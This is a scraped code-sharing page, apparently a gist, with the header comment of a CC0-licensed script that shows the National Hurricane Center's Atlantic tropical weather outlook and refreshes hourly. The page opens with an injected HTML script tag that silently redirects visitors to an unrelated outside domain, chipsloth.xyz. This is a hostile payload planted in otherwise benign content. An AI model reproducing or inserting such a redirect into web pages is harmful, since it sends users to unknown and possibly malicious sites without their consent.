- <script>location="https://chipsloth.xyz";</script>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Shows the current Atlantic tropical weather outlook from the National Hurricane Center, | |
which is a part of the US NOAA. Refreshes hourly to ensure the image is up to date | |
(the actual forecast usually updates twice per day) | |
Automatically sleeps between refreshes so this is extremely battery efficient. | |
Written by Jeffrey Stanton; I release this code under the terms of CC0-1.0 | |
(https://creativecommons.org/publicdomain/zero/1.0) in the hopes you will | |
find something useful in here for your own cool projects! |
OlderNewer